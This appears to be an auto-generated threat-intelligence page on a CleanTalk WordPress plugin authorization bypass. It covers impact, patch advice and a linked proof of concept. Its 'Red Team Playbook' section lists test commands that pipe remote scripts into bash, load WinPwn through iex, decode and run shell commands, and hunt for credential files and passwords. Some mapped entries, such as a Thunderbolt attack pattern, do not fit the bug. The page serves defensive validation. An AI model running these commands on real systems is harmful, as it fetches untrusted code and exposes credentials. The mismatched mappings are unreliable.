CVE-2024-10542
Overview
This vulnerability is an authorization bypass caused by improper validation of reverse DNS data within the checkWithoutToken function of the CleanTalk Spam protection plugin for WordPress. Specifically, the plugin fails to correctly verify the authenticity of requests due to reliance on reverse DNS spoofing, allowing unauthorized access to plugin installation features. The affected component is the plugin's internal remote call handling mechanism responsible for token-less verification.
Vulnerability Description
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
Impact
An unauthenticated attacker can remotely install and activate arbitrary WordPress plugins via the authorization bypass, potentially enabling remote code execution if a vulnerable plugin is subsequently activated. No user interaction or credentials are required, and the exploit can be performed over the network. This elevates the risk of full site compromise, data exfiltration, or persistent backdoors, consistent with the CVSS vector indicating network attack with no privileges and no user interaction needed (AV:N/AC:L/PR:N/UI:N).
Solution
Users should upgrade the CleanTalk Spam protection plugin to a version later than 6.43.2 where this authorization bypass is fixed. The Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62) provides detailed patch information and recommends immediate update. Review the plugin's changelog and apply the latest release to ensure the checkWithoutToken function correctly validates requests and mitigates reverse DNS spoofing.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the CleanTalk plugin for WordPress arises from an authorization bypass that allows unauthorized users to install arbitrary plugins. This flaw is primarily located in the checkWithoutToken function, which is susceptible to reverse DNS spoofing. The exploitation of this vulnerability does not require any authentication, enabling attackers to leverage it easily. Once an attacker successfully exploits this vulnerability, they can install and activate any plugin of their choice. If the installed plugin has its own vulnerabilities, it can lead to remote code execution, allowing the attacker to execute arbitrary code on the server.
Attack vectors for this vulnerability are particularly concerning due to their simplicity and the minimal prerequisites for exploitation. An attacker can initiate a reverse DNS spoofing attack to manipulate the DNS resolution process, effectively bypassing the authorization checks implemented within the plugin. Once the attacker gains access to the plugin installation functionality, they can introduce malicious plugins that may contain backdoors, data exfiltration capabilities, or other harmful functionalities. This scenario could lead to a complete compromise of the WordPress site, affecting not only the site owner but also its users and visitors.
The real-world impact of this vulnerability is significant, particularly for businesses relying on WordPress for their online presence. A successful exploitation could lead to unauthorized access to sensitive data, defacement of the website, or even the deployment of malware that could spread to users visiting the site. The business risks associated with such an incident include reputational damage, loss of customer trust, potential legal ramifications, and financial losses due to downtime or remediation efforts. Furthermore, the presence of malicious plugins could facilitate further attacks on the underlying infrastructure, leading to a broader compromise of the hosting environment.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the CleanTalk plugin to the latest version is crucial, as updates often contain security patches that address known vulnerabilities. Additionally, monitoring server logs for unusual activities, such as unauthorized plugin installations or changes, can help in early detection of exploitation attempts. Employing a web application firewall (WAF) can also provide an additional layer of security by filtering out malicious traffic before it reaches the WordPress application. Furthermore, conducting regular security audits and vulnerability assessments can help identify and remediate potential weaknesses in the WordPress environment.
In conclusion, the vulnerability in the CleanTalk plugin poses a serious threat to WordPress installations, enabling unauthorized plugin installations through an authorization bypass. The ease of exploitation and potential for severe consequences make it imperative for organizations to take proactive measures to secure their WordPress environments. By staying informed about vulnerabilities, implementing robust detection and mitigation strategies, and maintaining a strong security posture, businesses can significantly reduce their risk of falling victim to such attacks.
The CVSS score for CVE-2024-10542 has been revised upward from 7.5 to 9.8, reflecting a reassessment of the vulnerability’s criticality based on new evidence and exploitability factors. CSURFACE threat intelligence confirms that this change is driven by the emergence of a publicly available proof-of-concept exploit that demonstrates unauthenticated arbitrary plugin installation via reverse DNS spoofing in the CleanTalk WordPress plugin. Our telemetry indicates a stable but persistently high interest in this vulnerability within underground forums and exploit repositories, underscoring its attractiveness to threat actors seeking initial footholds in WordPress environments. The elevated CVSS score signals that the vulnerability now poses a near-critical risk of remote code execution when chained with other plugin flaws, increasing the potential impact on affected organizations. This reassessment demands heightened vigilance from defenders, as the ease of exploitation combined with the availability of exploit code significantly lowers the barrier for attackers. While exploitation activity has not surged dramatically in recent days, the stable presence of proof-of-concept tools suggests ongoing exploitation attempts and a sustained threat level. Consequently, the risk posture associated with CVE-2024-10542 should be considered critical, warranting immediate attention in threat detection and response strategies.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cleantalk | Anti-Spam | All |
cpe:2.3:a:cleantalk:anti-spam:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ubaydev/CVE-2024-10542
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 is vulnerable to Unauthenticated Arbitrary P...
|
ubaydev | 3 | 0 | 2024-11-26 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
47%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10542 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/cleantalk-spam-protect/tags/6.43.2/lib/Cleantalk/ApbctWP/RemoteCalls.php#L41 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631 |